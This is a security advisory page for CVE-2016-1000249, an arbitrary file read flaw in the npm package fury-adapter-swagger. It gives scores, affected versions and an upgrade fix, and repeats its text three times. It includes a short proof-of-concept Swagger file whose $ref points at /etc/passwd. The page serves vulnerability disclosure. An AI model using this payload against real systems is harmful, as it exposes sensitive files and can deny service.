CVE-2016-1000249
fury-adapter-swagger allows arbitrary file read from system
fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
Proof of Concept:
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
Recommendation
Upgrade to version 0.9.7 or later.
Attack profile
How easy it is to exploit
- Attack vector
- Network
- Complexity
- Low
- Privileges needed
- None
- User interaction
- None
What an attacker can affect
- Confidentiality
- Low
- Integrity
- Low
- Availability
- Low
What each source reports
GitHub Advisories Score usedGHSA-2r7f-4h2c-5x73
7.3
fury-adapter-swagger allows arbitrary file read from system
fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
Proof of Concept:
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
Recommendation
Upgrade to version 0.9.7 or later.
- Record
GHSA-2r7f-4h2c-5x73- CVSS 3.1
- 7.3 High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - Weakness
- CWE-22
- Updated
- 2026-11-02
OSVGHSA-2r7f-4h2c-5x73
7.3
fury-adapter-swagger allows arbitrary file read from system
fury-adapter-swagger from version 0.2.0 until version 0.9.7 has a weakness that allows an attacker to read arbitrary files off of the system. This can be used to read sensitive data, or to cause a denial of service condition by attempting to read something like /dev/zero.
Proof of Concept:
---
swagger: '2.0'
info:
title: Read local files
version: '1.0'
paths:
/foo:
get:
responses:
200:
description: Some description
examples:
text/html:
example:
$ref: '/etc/passwd'
Recommendation
Upgrade to version 0.9.7 or later.
- Record
GHSA-2r7f-4h2c-5x73- CVSS 3.1
- 7.3 High
CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:L/A:L - Weakness
- CWE-22
- Updated
- 2026-11-02
Affected packages
| Package | Affected | Fixed |
|---|---|---|
fury-adapter-swaggernpm |
0.2.0 up to 0.9.7 | 0.9.7 |
History
| Recorded | Changed | Sources |
|---|---|---|
| first indexed | GitHub Advisories, OSV |
Dates are when Every CVE recorded each change. Upstream dates may differ.
In short
CVE-2016-1000249 is a high vulnerability (CVSS 7.3) in fury-adapter-swagger, published September 1, 2020. No source lists public exploit code. Fixed in fury-adapter-swagger 0.9.7.
References
npmjs.com/advisories/305
github.com/apiaryio/fury-adapter-swagger/pull/89
github.com/apiaryio/fury-adapter-swagger/commit/777e2d68f03546a88f3203bbd4725df8b1f662a7
github.com/apiaryio/fury-adapter-swagger/commit/f4407e3a5323bc31123d45dbc93b8417002e4d51
security.snyk.io/vuln/npm:fury-adapter-swagger:20161024
github.com/advisories/GHSA-2r7f-4h2c-5x73
github.com/apiaryio/fury-adapter-swagger